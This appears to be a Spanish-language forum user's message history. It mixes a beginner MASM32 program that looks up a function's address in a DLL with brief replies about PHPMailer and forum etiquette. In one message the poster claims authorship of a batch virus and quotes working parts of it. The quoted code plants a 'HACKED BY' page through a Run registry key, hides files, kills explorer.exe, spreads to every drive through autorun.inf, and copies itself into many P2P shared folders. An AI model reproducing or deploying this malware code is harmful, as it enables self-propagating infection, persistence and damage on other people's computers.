Mensajes

[cmp]

Pensé que después de hacer cmp eax perdería su valor del invoke.

También me comentaron que en vez de:

Código (asm) [Seleccionar] Expandir

cmp resultado, NULL
pusiera:

Código (asm) [Seleccionar] Expandir

or eax, eax
ya que los registros son más rápidos que las variables, y según Intel or es más rápido que cmp.


Saludos!

[libreria]

Bueno, os dejo mi primera aplicación en ASM (MASM32).

Busca el offset de una función específica en una DLL. Solo hay que modificar "libreria" y "funcion" en .data (tengo que aprender a hacerlo pasando parámetros por línea de comandos).

Código (asm) [Seleccionar] Expandir

;Busca offsets - by pablomi
.386
.model flat, stdcall
option casemap :none

include \masm32\include\masm32rt.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\masm32.lib

Main PROTO

.data
    libreria db "msvcrt.dll",0
    funcion db "printf",0
    error db "No se encontro el proceso.",0

.code
codigo:
    invoke Main
    invoke ExitProcess, 0

Main PROC
    LOCAL resultado:DWORD
   
    invoke LoadLibrary, addr libreria
    invoke GetProcAddress, eax, addr funcion
    mov resultado, eax
    cmp resultado, NULL
    je Error
    invoke StdOut, uhex$(resultado)
    ret
Error:
    invoke StdOut, addr error
    ret
Main ENDP

end codigo

Espero críticas, sugerencias o lo que sea

bueno, lei sobre phpmailer y es lo que necesito, pero queria hacer una pregunta :

cuales son los datos que debo escribir en los campos username y contraseña que aparecen en el script de phpmailer ?

Gracias por la ayuda

Los datos del SMTP.

No estoy de acuerdo, tengo 12 y no hago eso. Si ha causado daño y lo han pillado lo pagará y listo. Si no, nada...

Le caerán trabajos sociales

Aunque extorsión es más grave que un "simple deface"

Busca sobre la función mail() o la clase phpmailer.


Saludos!

[autoexec_a]

Nadie lo duda, pero sino aportas pruebas yo también puedo decir que lo hice yo.

Aunque viendo el post no me estraña que sea un ripper porque no ha usado etiquetas y se notan ciertas partes de diferente estilo con respecto a la programación y al nivel.

En el código original no era IDEAS.html, era IEAS:

Código (dos) [Seleccionar] Expandir


:IEAS
(ECHO.^<HTML^>
ECHO.^<HEAD^>
ECHO.^<title^>HACKED BY [antiguo_nick_mio]^</title^>
ECHO.^</HEAD^>
ECHO.^<BODY^>
ECHO.^<H1^>                  ~~~HACKED BY [antiguo_nick_mio]~~~
ECHO.^</BODY^>
ECHO.^</HTML^>)>%HOMEDRIVE%\IEAS.HTML
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v aErx_sys /t REG_SZ /d "%HOMEDRIVE%\IEAS.HTML"
ATTRIB +H %HOMEDRIVE\IEAS.HTML
GOTO:EOF



Esta linea:

Código (dos) [Seleccionar] Expandir

tasskill /im explorer.exe /f>nul 2>&1 || taskill explorer>nul 2>&1
copiada tal cual de otro virus mío que llamé "BaTr00t_a".

Código (dos) [Seleccionar] Expandir

for %%# in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
copy /Y "%homedrive%\autorun.inf" "%%#:\autorun.inf">nul 2>&1
copy /Y "%0" "%%#:\baTr00t_a.bat">nul 2>&1
attrib +R +S +H "%%#:\autorun.inf">nul 2>&1
attrib +R +S +H "%%#:\baTr00t_a.bat">nul 2>&1
)
Lo mismo con esta parte, que el ripper no fue muy hábil porque como podeis ver en el código tiene puesto autoexec_a (conservando el _a).


Y esta parte:

Código (dos) [Seleccionar] Expandir


:p2prop
set var=%1
copy /y "%0" "%programfiles%\Morpheus\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\ICQ\shared files\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\KaZaA\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Shareaza\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\EDONKEY2000\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\eMule\Incoming\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Filetopia3\Files\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\XoloX\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Gnucleus\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\LimeWire\Shared\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Grokster\My Grokster\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Overnet\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%appdata%\Ares\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Swaptor\Download\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\WinMX\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Tesla\Files\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\BearShare\Shared\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Rapigator\Share\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\KaZaA Lite\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\KMD\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\appleJuice\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Direct Connect\Received Files\%var%.bat">nul 2>&1
goto:eof

Ya ni siquiera se molestó en modificarla.


La creación del autorun.inf lo mismo.



En realidad todo es mío, solo que el mío se auto-ocultaba con VBScript y se autoejecutaba con una bomba fork.


No aporto links para no hacer spam, pero en google podeis encontrarlo.

Pero vamos, que me da igual, que sigan rippeando, así llegarán lejos.


Saludos!

[IGUAL]

Que pena que algunas partes del código sean exactamente IGUAL a un "virus" que programé hace dos años.

muchas gracias....aunque me gustaria saber programacion en html ya que no se nada sobre desarrollo de pag web solo tengo conocimientos de c++

¿Y por qué no te pasas por la sección de Desarrollo web? Los foros están organizados para que la gente
pueda encontrar lo que busca en un par de clics, si esto no fuera así no se dividiría por temática.

Yo en principio me apunto, pero a ver los horarios y eso, va ser un poco difícil

domicilio y nombre no pueden ser char xD